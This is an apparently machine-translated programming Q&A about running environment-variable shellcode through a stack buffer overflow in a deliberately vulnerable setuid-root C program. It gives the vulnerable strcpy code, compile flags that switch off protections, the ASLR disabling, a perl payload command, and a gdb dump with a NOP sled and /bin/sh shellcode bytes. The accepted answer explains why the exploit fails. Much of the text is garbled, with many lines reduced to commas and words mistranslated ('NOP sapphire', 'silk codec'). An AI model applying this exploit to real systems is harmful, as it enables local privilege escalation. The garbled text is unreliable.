Executing shellcode stored in an environment variable using buffer overflow

Question

Executing shellcode stored in an environment variable using buffer overflow

I use the code below to try to execute some shell code stored in an environment variable by overflowing the searchstring variable so that the return address main contains the address of the environment variable. However, I get a segmentation error before the printf command.

#include <stdio.h>
#include <string.h>

void main(int argc, char *argv[]){

    char searchstring[100];

    if(argc > 1)
        strcpy(searchstring, argv[1]);
    else // otherwise
        searchstring[0] = 0;

    printf("Here");

}

I will compile the code using

gcc -m32 -g -o overflow.o overflow.c -fno-stack-protector -z execstack

to disable the stack protector and make the executable a stack. I also disabled ASLR by changing / proc / sys / kernel / randomize _va_space to contain 0. I also change the owner and group to root:

sudo chown root:root overflow.o
sudo chmod u+s overflow.o

The environment variable contains the NOP sapphire in front of the silk codec, and I determined that the address 0xffffd910 is in the middle of the NOP salon. So I run the program using

./overflow.o $(perl -e 'print "\x10\xd9\xff\xff"x40')

but you’ll see a segmentation error.

gdb, main, . seg , printf , seg fault, ,

(gdb) x/32x $esp
0xffffd910:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd920:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd930:     0x90909090      0x90909090      0xdb31c031      0xb099c931
0xffffd940:     0x6a80cda4      0x6851580b      0x68732f2f      0x69622f68
0xffffd950:     0x51e3896e      0x8953e289      0x0080cde1      0x4d524554
0xffffd960:     0x6574783d      0x53006d72      0x4c4c4548      0x69622f3d
0xffffd970:     0x61622f6e      0x58006873      0x4d5f4d44      0x47414e41
0xffffd980:     0x6d3d4445      0x6f687465      0x6c633d64      0x69737361

(gdb) x/x $eip  
0x90909090:     Cannot access memory at address 0x90909090

main ( 0xffffd460) , 0xffffd910 searchstring:

(gdb) x/32x 0xffffd460
0xffffd460:     0xffffd49f      0xffffd49e      0xffffd590      0xffffd910
0xffffd470:     0xffffd910      0xffffd910      0xffffd910      0xffffd910
0xffffd480:     0xffffd910      0xffffd910      0xffffd910      0xffffd910
0xffffd490:     0xffffd910      0xffffd910      0xffffd910      0xffffd910
0xffffd4a0:     0xffffd910      0xffffd910      0xffffd910      0xffffd910
0xffffd4b0:     0xffffd910      0xffffd910      0xffffd910      0xffffd910
0xffffd4c0:     0xffffd910      0xffffd910      0xffffd910      0xffffd910
0xffffd4d0:     0xffffd910      0xffffd910      0xffffd910      0xffffd910

, , main ? , 0x90909090, 0xffffd910? , , , ?

, , , .

!

+1

c segmentation-fault linux buffer-overflow exploit

epsilonjon 20 . '14 20:09

2

, esp . "\ x10\xd9\xff\xff" ?

segfault, , RET, POP% eip, % esp 0x90909090, , , .

+1

Cronovirus 20 . '14 22:42

epsilonjon · Accepted Answer · 2014-12-21T18:29:43+0000

, . 3

0x08048485 <+59>:    mov    ecx,DWORD PTR [ebp-0x4]
0x08048488 <+62>:    leave  
0x08048489 <+63>:    lea    esp,[ecx-0x4]
0x0804848c <+66>:    ret

searchstring , ebp-0x4 , NOP (0xffffd910). 1 0xffffd910, ecx.

, 3 ecx-0x4 = 0xffffd910 - 0x4 = 0xffff90c, esp. , , 0x90909090 ( NOP). , main(), eip = 0x90909090, popping , esp 0xffff90c + 0x4 = 0xffffd910.

, main() . C " " - - , gcc-multilib 4.9.2-1 Arch Linux, .

Executing shellcode stored in an environment variable using buffer overflow

More articles: